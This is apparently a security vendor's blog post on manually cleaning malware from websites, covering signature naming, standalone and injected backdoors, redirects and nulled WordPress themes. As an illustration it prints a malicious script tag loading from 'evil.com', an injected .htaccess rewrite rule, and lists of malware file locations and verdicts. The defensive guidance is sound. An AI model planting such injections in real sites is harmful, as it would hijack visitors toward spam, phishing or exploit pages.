Imunify360 Blog

Manual malware cleanup

Written by Andrey Kucherov | Dec 12, 2023 1:00:00 PM

How to clean a website? How to remove malware? In case ImunifyAV, Linux server antivirus, signals about malware that have been found, please find the guidelines for the malware infection cleanup which can be done manually below:


Step 1: Backup

Before cleaning the website it is highly recommended to perform a full backup of the data undergoing cleanup. For example, for a WordPress-based website - please make sure that backup has been made not only for files but for the database as well.

Step 2: Understand What the Malware Is

First of all, all Imunify products follow the malware classification convention. Here are few brief classification examples:

 

Malware type

Detection type

ID

filetype.categorty.classification

Version

SMW

INJ

16402

js.spam.redi

18

CMW

SA

12147

mlw.wshll

5

SMW

BLKH

1246640

php.bkdr.anonfox.autoast

1

 

SMW - stands for Server Malware, it means that malicious code executes on the server side. CMW - malicious executes on the client’s side, e.g in the browser.

INJ - malicious code was injected in the file. 

SA and BLKH - standalone malware file - fully malicious.

 

Imunify360 also has the ability to clean up malware in the database, it uses its innovative MDS (Malware Database Scanner), to clean up arbitrary redirects, spam/phishing, and PHP/JS malware. Any regular signatures also work on db, additionally, it may find CMW-URL-* detections, they are signatures based on the proper Imunify360 malicious URLs database, an advanced global intelligence db.

 

Step 3: Malware Removal

Manual malware removal will require some basic knowledge of the command line and programming. Alternatively, Imunify360 can handle malware removal in seconds and ensure the reliability of the server.

 

Step 3.1: Removal of Standalone Malware

In case the file is flagged by -SA- or -BLKH- signature - it is entirely malicious and can be completely removed using control panel file manager or Linux CLI.

Here is a top 20 standalone malware verdicts:

 

SMW-SA-15778-php.bkdr.wshll.wpnull24

SMW-SA-12273-mlw.drwy

SMW-SA-15255-php.bkdr.wshll.wpnull24

SMW-SA-04892-php.bkdr.wpvcd

SMW-SA-17965-php.bkdr.wp.fake

SMW-SA-15534-php.bkdr.drpr.wpnull24

SMW-SA-12883-mlw.phish

SMW-SA-13119-mlw.tool.spam.wpvcd

SMW-SA-15256-php.bkdr.wshll

SMW-SA-13600-php.phish.gen

SMW-SA-16489-php.deface.gen

SMW-SA-15618-php.bkdr.fakeplugin.wpvcd

SMW-SA-12609-mlw.deface

SMW-BLKH-74202-elf.trojan

SMW-BLKH-20827-php.spam

SMW-BLKH-33002-html.phish

 

Figure 1 - Standalone malware alert

 

Backdoors

Often standalone malicious software spreads freely as part of a nulled popular theme or plugin.

Figure 2 - Standalone backdoor in nulled theme

 

The figure above shows part of the standalone backdoor bundled together with the nulled website template flagged by SMW-SA-15255-php.bkdr.wshll.wpnull24

 

Phishing

Another great example of standalone malicious files is phishing. Typically all phish infections are standalone. Here is an example that mimics as Google sign-in form. SMW-SA-18231-html.phish:

Figure 3 - Standalone phishing file

Hacking Tools

The screenshot below shows part of the standalone PHP hacker toolkit produced by AnonymousFox hacker group and it is flagged as SMW-BLKH-1246640-php.bkdr.anonfox.autoast

Figure 4 - AnonymousFox hacking tool

Fake Favicon

On the listing below there are fake favicon .ico files that have malicious code inside them.

Top standalone malware file locations cloaking as .ico: 

wp-content/.102ab028.ico

wp-includes/js/codemirror/.903876dc.ico

sites/favicon_3bedeb.ico

favicon_1c9d85.ico

wp-content/uploads/2015/02/init.locked.ico

wp-includes/apache.ico

cgi-bin/.a3269f8f.ico

wp-content/themes/twentyfourteen/suspected.client.ico

components/cookie.http.ico

wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/clases.session.ico

public_html/favicon.ico

public_html/fav.ico

wp-includes/js/tinymce/themes/css.db.ico

httpdocs/path/modes.session.ico

public_html/favicon11.ico

/sites/default/files/favicon.src.ico

/uploads/suspected.system.ico

 

Warning!

In some cases, standalone malware might be passed as an include file by malware injections to some legitimate files on the website. In this case, removing the standalone file might cause 5xx server-side errors or a White Screen Of Death (WSOD) for the website. To be on the safe side it is mandatory to perform a search from the website webroot for any possible file inclusions. Here is an example of a CLI command to search for non-obfuscated WP-VCD malware inclusion instructions:

grep -r --include=*.php -e "class.plugin-modules.php" -e

"class.theme-modules.php" -e "wp-vcd.php" -e "wp-tmp.php" .

This command will search within the code of all PHP files and return the filenames that contain any mentioning of the detected standalone malware files.

Alternatively standalone malicious files could be left empty instead of being completely removed to make sure that any left-over inclusion will not cause server errors.

 

Step 3.2: Removal of Injected Malware

The injection type is a bit more tricky. They have -INJ- suffix in the verdict. Several types of cases that can occur will be reviewed in this article as well as what can be done to manually clean out the injections.

Figure 5 - Redirecting JavaScript injection rated as  SMW-INJ-18422-js.spam.redi

Redirecting Injections


Top 10 redirecting malware verdicts:

SMW-INJ-16270-js.spam.redi

SMW-INJ-18008-js.spam.redi

SMW-INJ-17803-php.spam.drwy

SMW-INJ-16402-js.spam.redi

SMW-INJ-17738-js.spam.redi

SMW-INJ-17896-js.spam.redi

SMW-INJ-03990-html.drwy

SMW-INJ-04270-htcss.mlw

SMW-INJ-15453-js.spam.redi

SMW-INJ-18223-js.spam.redi


Redirecting malware usually redirects website user to spam sites, unwanted sites like pharma, adult websites, phishing pages or even tries to exploit vulnerable client’s software and compromise the system.

Figure 6 - .htaccess malware alert

Here is the list of redirection types covering major part of them:

  • Redirection hack in .htaccess. Example of redirect based on .htaccess rule injection:

RewriteRule ^(.*),(.*)$ $2.php?rewrite_params=$1&page_url=$2

   

Another example shown on the following figure.

Figure 7 - redirecting .htaccess injection flagged by SMW-INJ-18736-htaccess.spam.redi

  • Redirection hidden in CMS core files. Usually it is hidden in wp-config.php. Sometimes redirecting malware injections are hidden in core files like index.php, header.php, footer.php, wp-load.php, etc.
  • JavaScript redirection malware infects the JavaScript(.js) files or injects redirecting scripts into PHP files.
    Example: SMW-INJ-16402-js.spam.redi-18

Figure 8 - JavaScript redirection malware alert

 

Mitigation: 

  1. Identify malware code inside the file. Sometimes it can be pretty straightforward, in other cases injection might be hidden.
    Different approaches are possible here, for example:
    • comparing with old clean backups,
    • comparing with the initial repository/vendor package of the CMS, theme, plugin, template.

    In most cases it is also possible to identify malicious injection visually:

    • obfuscated code inside of regular code,
    • different formatting type,
    • no line breaks (CR LF symbols).
  2. Clean out the malware using a control panel file manager or Linux CLI.
    The below example shows a malicious redirection website link attached to a JavaScript file. 
    <script type='text/javascript' src='evil.com/y.js'></script>

    With use of vi, emacs, vim or nano CLI editors a maliciously injected domain can be removed. Here ‘evil.com’ is an example of a malicious redirecting domain.
    After removal:

    <script type='text/javascript' src=''></script>


    Of course, the injection might be much more complicated and the amount of the code that has to be removed may vary. The following command
    $ php -l traget_file.php
    can be used to make sure that PHP syntax was not broken after injection removal.

  3. In case if malware injection has been present in the .htaccess file, it might be hard, in some cases, to identify the start and the end of the injection. Incorrect removal of the injection might also break the syntax of the .htaccess file and lead to website malfunction. In order to avoid such issues for .htaccess cleanup, it is recommended to restore it from the clean backup before the infection appeared or copy from the vendor’s website of the CMS used. For example, samples of WordPress .htaccess files can be found using this link. And here is the link for Joomla!

Hidden Backdoors


Top 10 verdicts of injected backdoors:

SMW-INJ-03431-php.bkdr.eval.oneliner

SMW-INJ-15535-php.bkdr.incl.wpnull24

SMW-INJ-14070-php.bkdr

SMW-INJ-04278-php.bkdr

SMW-INJ-03933-php.bkdr

SMW-INJ-06044-php.bkdr.wpvcd

SMW-INJ-17722-php.bkdr.exec

SMW-INJ-12444-php.bkdr

SMW-INJ-13122-php.bkdr.wp.remote

SMW-INJ-03548-php.bkdr

 

Usually, dangerous PHP functions such as eval, file_get_contents, create_function, etc. found in files located in wp-includes, images or other locations not designed for direct PHP code execution indicate malware injection. It also can be some CMS specific inserts like an admin user dropper function or attacker autologin function (under administrator).

 

Figure 9 - Alert for backdoor found wp-includes

 

Figure 10 - Backdoor in vim editor

 

In the example above, the WordPress targeted backdoor allowing attackers to autologin to the administrator panel. Unfortunately, it is not always easy to identify the backdoor visually. If clean source files of the software are available it is possible to use `diff` in server CLI or some online tool like diffnow to identify the injected code:

Figure X - Difference between the file infected by a backdoor and clean file

Mitigation: 

Cleanup for such injections is similar to the previous section - via either the use of the file manager of the control panel or any CLI editor prefered to remove the malware inserts.

 

Figure 11 - Beginning of redirecting PHP injection inside nulled theme file flagged by SMW-INJ-13960-php.bkdr.wpvcd

Nulled Themes Malware


Top 10 nulled theme injections:

SMW-INJ-15535-php.bkdr.incl.wpnull24

SMW-SA-04892-php.bkdr.wpvcd

SMW-INJ-15539-php.bkdr.incl.wpnull24

SMW-INJ-12809-php.bkdr.wpvcd

SMW-INJ-06044-php.bkdr.wpvcd

SMW-INJ-03674-php.bkdr.wpvcd

SMW-INJ-13126-php.bkdr.wpvcd

SMW-SA-18218-php.bkdr.wpvcd

SMW-INJ-13129-php.bkdr.wpvcd

 

Quite a big part of the modern malware landscape is taken by injections coming from nulled, cracked premium CMS templates. Very often such injections look similar to normal WordPress theme code.

Figure 12 - WPVCD infection alert for WordPress core file

 

Here the injection itself looks pretty benign:

Figure 13 - WPVCD injection that executes an additional file that contains a backdoor


Top 10 included backdoor file locations, some of them might be standalone malware, others not:

/wp-content/plugins/mplugin.php

/wp-content/themes/exampletheme/class.theme-modules.php

/wp-content/plugins/xmplplgn/functions/class.plugin-modules.php

/assets/.default

/wp-includes/js/tinymce/themes/themes.php

/wp-admin/css/colors/colors.php

/wp-content/uploads/2021/08/xuipenhd.php

/wp-content/uploads/woocommerce_uploads/ytxpdvte.php

/wp-content/plugins/monit.php

/modules/mod_wrapper/nepetfzv.php

 

Nulled themes quite often have a massive amount of backdoor injections in almost all files they contain. It may take some time to clean up all infections manually or will require some coding skills to automate the action.

Mitigation

Cleaning a nulled theme manually might be tricky since the clean version of the software might be not available and in some cases. It may be hard to understand which code is injected - the best option here is to restore the website from a backup prior to the theme installation and replace it with a clean (non-hacked) version.Alternatively, follow the previous steps described for standalone and injected malware to attempt to clean up the files manually.

Step 4: Repeat

Finally, after cleanup is done - rescan the website and make sure no more malware is present on the website. If something is still present - please repeat the steps of this guide starting from Step 2.

Step 5: Secure

After cleanup is completed follow this guide to make sure the infection will not happen again.

 

Conclusion

This article covers more than 50% of infection cases that the Imunify malware processing team saw during the last month. Naturally, there could be other even more complex variations of infections. A description of how to remove such malware just couldn’t fit into a blog article. Regardless of whether it is a typical infection or rare case - ImunifyAV+ could handle any of those malicious files. Please consider ImunifyAV+ as your tool of choice to fight malicious infections - it provides the built-in, one-click cleanup feature. Or get it as part of Imunify360's complete and comprehensive website security solution, which also includes an intelligent WAF, IDS and IPS, Proactive Defense, automated kernel patch management and more.